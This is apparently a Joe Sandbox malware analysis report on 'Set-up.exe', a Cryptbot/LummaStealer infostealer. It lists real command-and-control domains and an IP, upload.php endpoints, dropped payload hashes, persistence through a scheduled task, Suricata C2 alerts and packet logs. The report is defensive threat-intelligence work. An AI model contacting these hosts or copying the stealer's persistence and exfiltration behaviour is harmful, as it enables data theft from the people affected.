Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	45%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://gcc.gnu.org/bugs/):	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
fiftvx15pt.top	185.244.181.140	true	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
analforeverlovyu.top	true	URL Reputation: safe	unknown
fiftvx15pt.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	HwYuaUvXqdEkCixuJard.dll.0.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://serviceupdate32.com/update	Set-up.exe	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Set-up.exe, 00000000.00000003.2378064037.0000000003950000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://fiftvx15pt.top/v1/u/	Set-up.exe, 00000000.00000003.2336556663.0000000001768000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000000.00000003.2336684023.000000000176A000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.244.181.140	fiftvx15pt.top	Russian Federation		44901	BELCLOUDBG	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1525762
Start date and time:	2024-10-04 14:43:32 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 41s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Set-up.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/2@2/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target Set-up.exe, PID 6244 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Set-up.exe

Simulations

Behavior and APIs

Time	Type	Description
08:44:43	API Interceptor	3x Sleep call for process: Set-up.exe modified
08:46:08	API Interceptor	519x Sleep call for process: service123.exe modified
14:45:35	Task Scheduler	Run new task: ServiceData4 path: C:\Users\user\AppData\Local\Temp\/service123.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.244.181.140	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sixvv16pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvx13pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	forvc14pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	fiftvx15pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sevtvx17pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	tventyvr20pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	sixvv16pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	forvc14pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	thirtvx13pt.top/v1/upload.php
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	elevenvx11ht.top/v1/upload.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
fiftvx15pt.top	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BELCLOUDBG	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140
	Set-up.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse	185.244.181.140

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	315803136
Entropy (8bit):	0.05440071376348931
Encrypted:	false
SSDEEP:	24576:UrAG1Bm/PeTvaTFOXGT+ZBQUGDXo2yWNnREdP1YX/uHJ0H8wsi:/eGjIWNn0PeXhHD
MD5:	2F9A78533C8B8DA00A46D100D6A70325
SHA1:	D61B0C5C2883B266E5DB15563D6730FC86DEE5CD
SHA-256:	6A58E641AE0DF9778542DFBB408D27FF77F79B294FD2562B4BB20A6BC24937C3
SHA-512:	A2BA680B81AE6B9893AD52A91D65D0184EF73486B5099A03BD96A4B440128FB4F5E1E1B7B55A829E41C1B8EED3E95615C01260B532768BDEC4C783D281DFA9EB
Malicious:	false
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...........#...(...........................o.........................@.......<....@... .........................`.......................................@z...........................=.........................t............................text...8...........................`..`.data...............................@....rdata..............................@..@.eh_framX...........................@..@.bss.........p...........................edata..`............:..............@..@.idata...............<..............@....CRT....,............F..............@....tls.................H..............@....reloc..@z.......\|...J..............@..B................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\service123.exe

Download File

Process:	C:\Users\user\Desktop\Set-up.exe
File Type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	314617856
Entropy (8bit):	0.0023404957167422586
Encrypted:	false
SSDEEP:
MD5:	49859361F2114985E390C5057AAADD9A
SHA1:	2E630554B35172D2849C98C69FC0CE1FF82C85C4
SHA-256:	C5FAC898AA0F031D56028E4D19841106967059877185265F4D5DB82FFE4CFE02
SHA-512:	A1A780CDE311FBAD9B97919F90F83349EABE5C06E16CD03912F1240298F702F418F64507FBBAE36EEC2A7AC499442AAF8BBF1517E53903D23A363C1DC2E3B1F9
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f...............(.v........................@.......................... ............@... .................................................................d...........................D.......................T................................text....t.......v..................`..`.data...T............z..............@....rdata...............\|..............@..@.eh_fram............................@..@.bss....t................................idata..............................@....CRT....0...........................@....tls................................@....reloc..d...........................@..B........................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	2.7822577969630338
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Set-up.exe
File size:	9'979'904 bytes
MD5:	aa8809ce5384175be7c0efb2604787f6
SHA1:	4cfdea7c7b47f16e767901d733be97a6635fd455
SHA256:	78e8980aa18bea446cd21ba2c19fa7a3f79fafb3d713e03376d691900bf9d24e
SHA512:	20951db2274ea7d0456509adf85f162fea3770e362ccee4c0dcc57f721da469b98faada08e3f21927a6de9943384761725ba3a619f33b022c72bf6d4e75227a0
SSDEEP:	49152:WZ+hf/Tx8kxnYWQenEYez4gHTBF9NiqaSDT8:Yuf/tDhYL8vQ
TLSH:	02A6B362DD8791FEE19309B89006F37F1A34AB05885DC67DDF44DB91DBB2A3CD4AA012
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...,..f...............(..,..D...............0,...@.......................................@... ......................0..B..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x4014a0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x66FF942C [Fri Oct 4 07:07:24 2024 UTC]
TLS Callbacks:	0x401800, 0x4017b0
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	208ad2c8c137e3d4c33022e4bb87e9bb

Entrypoint Preview

Instruction
mov dword ptr [00D42070h], 00000001h
jmp 00007F104935D296h
nop
mov dword ptr [00D42070h], 00000000h
jmp 00007F104935D286h
nop
sub esp, 1Ch
mov eax, dword ptr [esp+20h]
mov dword ptr [esp], eax
call 00007F104936B996h
cmp eax, 01h
sbb eax, eax
add esp, 1Ch
ret
nop
nop
nop
nop
nop
nop
nop
nop
push ebp
mov ebp, esp
push edi
push esi
push ebx
sub esp, 1Ch
mov dword ptr [esp], 00D34000h
call dword ptr [00D4422Ch]
sub esp, 04h
test eax, eax
je 00007F104935D655h
mov ebx, eax
mov dword ptr [esp], 00D34000h
call dword ptr [00D4424Ch]
mov edi, dword ptr [00D44234h]
sub esp, 04h
mov dword ptr [00D42028h], eax
mov dword ptr [esp+04h], 00D34013h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov esi, eax
mov dword ptr [esp+04h], 00D34029h
mov dword ptr [esp], ebx
call edi
sub esp, 08h
mov dword ptr [006C3004h], eax
test esi, esi
je 00007F104935D5F3h
mov dword ptr [esp+04h], 00D4202Ch
mov dword ptr [esp], 00D3F104h
call esi
mov dword ptr [esp], 00401580h
call 00007F104935D543h
lea esp, dword ptr [ebp-0Ch]
pop ebx
pop esi

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x943000	0x42	.edata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x944000	0xa98	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x947000	0x44268	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x93d184	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x94420c	0x1a8	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2c1b28	0x2c1c00	0f7cc681cb78047b1c844485edd1e76c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x2c3000	0x670b60	0x670c00	1495e01afe1f9c7eb927e71ec6577f8b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x934000	0xa2b4	0xa400	45bec5fed7b457f88310edbb3b339b7b	False	0.3811213795731707	data	4.475928089316242	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.eh_fram	0x93f000	0x21d8	0x2200	9e20408a0c418a14ac5442c4a85e7516	False	0.3249080882352941	data	4.855563621931278	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss	0x942000	0xb74	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0x943000	0x42	0x200	f4ac2ed4b85d66ca345aa4c45ed31010	False	0.123046875	data	0.7119849421825885	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.idata	0x944000	0xa98	0xc00	f087d11a757393473d71d554d42efe81	False	0.3818359375	data	4.796805098760762	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0x945000	0x30	0x200	947565758601e59a9e2e145caaaaefe2	False	0.064453125	data	0.2044881574398449	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x946000	0x8	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc	0x947000	0x44268	0x44400	b9ecf4187734cd07e767d8dddb395e1c	False	0.1941642342032967	data	6.769566107412749	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	CryptAcquireContextA, CryptGenRandom, CryptReleaseContext
KERNEL32.dll	DeleteCriticalSection, EnterCriticalSection, FreeLibrary, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetStartupInfoA, GetTempPathA, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, LoadLibraryA, MultiByteToWideChar, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte, lstrlenA
msvcrt.dll	__getmainargs, __initenv, __mb_cur_max, __p__acmdln, __p__commode, __p__fmode, __set_app_type, __setusermatherr, _amsg_exit, _assert, _cexit, _errno, _chsize, _exit, _filelengthi64, _fileno, _initterm, _iob, _lock, _onexit, _unlock, abort, atoi, calloc, exit, fclose, fflush, fgetpos, fopen, fputc, fread, free, freopen, fsetpos, fwrite, getc, islower, isspace, isupper, isxdigit, localeconv, malloc, memcmp, memcpy, memmove, memset, mktime, localtime, difftime, _mkdir, perror, puts, realloc, remove, setlocale, signal, strchr, strcmp, strerror, strlen, strncmp, strncpy, strtol, strtoul, tolower, ungetc, vfprintf, time, wcslen, wcstombs, _stat, _write, _utime, _open, _fileno, _close, _chmod
SHELL32.dll	ShellExecuteA

Exports

Name	Ordinal	Address
main	1	0x5ae1c0

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-04T14:44:43.997360+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.6	49747	185.244.181.140	80	TCP
2024-10-04T14:44:47.562446+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.6	49775	185.244.181.140	80	TCP
2024-10-04T14:44:52.482026+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.6	49802	185.244.181.140	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 14:44:43.276422024 CEST	49747	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:43.281261921 CEST	80	49747	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:43.281367064 CEST	49747	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:43.281541109 CEST	49747	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:43.281637907 CEST	49747	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:43.286467075 CEST	80	49747	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:43.286576033 CEST	80	49747	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:43.996881962 CEST	80	49747	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:43.997359991 CEST	49747	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:44.001677990 CEST	80	49747	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:44.001739979 CEST	49747	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:44.002470970 CEST	80	49747	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.505186081 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.510253906 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.510341883 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.511284113 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.511374950 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.516117096 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.516182899 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.516232967 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.516279936 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.516290903 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.516307116 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.516356945 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.516439915 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.516453028 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.516465902 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.516477108 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.516483068 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.516489983 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.516500950 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.516520977 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.516561031 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.521034956 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.521173000 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.521186113 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.521193027 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.521203041 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.521258116 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.521450996 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.521461964 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.521506071 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.562319040 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.562446117 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.610379934 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.610502005 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.662345886 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.662389994 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.714824915 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.714880943 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.765711069 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.765779018 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.814330101 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.814461946 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.862653017 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.862713099 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:47.914349079 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:47.986191988 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:48.449207067 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:48.449362040 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:48.449428082 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:48.450954914 CEST	49775	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:48.455815077 CEST	80	49775	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.665990114 CEST	49802	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:51.670895100 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.670994997 CEST	49802	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:51.671138048 CEST	49802	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:51.671221018 CEST	49802	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:51.676019907 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.676115990 CEST	49802	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:51.676147938 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.676170111 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.676172018 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.676220894 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.676230907 CEST	49802	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:51.676264048 CEST	49802	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:51.676274061 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.676285028 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.676301956 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.676317930 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.676327944 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.676412106 CEST	49802	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:51.676412106 CEST	49802	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:51.681127071 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.681197882 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.681206942 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.681216002 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.681226969 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.681235075 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:51.722362041 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:52.481091976 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:52.481360912 CEST	80	49802	185.244.181.140	192.168.2.6
Oct 4, 2024 14:44:52.482026100 CEST	49802	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:52.482026100 CEST	49802	80	192.168.2.6	185.244.181.140
Oct 4, 2024 14:44:52.486824036 CEST	80	49802	185.244.181.140	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 4, 2024 14:44:42.039418936 CEST	65161	53	192.168.2.6	1.1.1.1
Oct 4, 2024 14:44:43.047559977 CEST	65161	53	192.168.2.6	1.1.1.1
Oct 4, 2024 14:44:43.271162033 CEST	53	65161	1.1.1.1	192.168.2.6
Oct 4, 2024 14:44:43.271176100 CEST	53	65161	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 4, 2024 14:44:42.039418936 CEST	192.168.2.6	1.1.1.1	0xcc8d	Standard query (0)	fiftvx15pt.top	A (IP address)	IN (0x0001)	false
Oct 4, 2024 14:44:43.047559977 CEST	192.168.2.6	1.1.1.1	0xcc8d	Standard query (0)	fiftvx15pt.top	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 4, 2024 14:44:43.271162033 CEST	1.1.1.1	192.168.2.6	0xcc8d	No error (0)	fiftvx15pt.top		185.244.181.140	A (IP address)	IN (0x0001)	false
Oct 4, 2024 14:44:43.271176100 CEST	1.1.1.1	192.168.2.6	0xcc8d	No error (0)	fiftvx15pt.top		185.244.181.140	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

fiftvx15pt.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
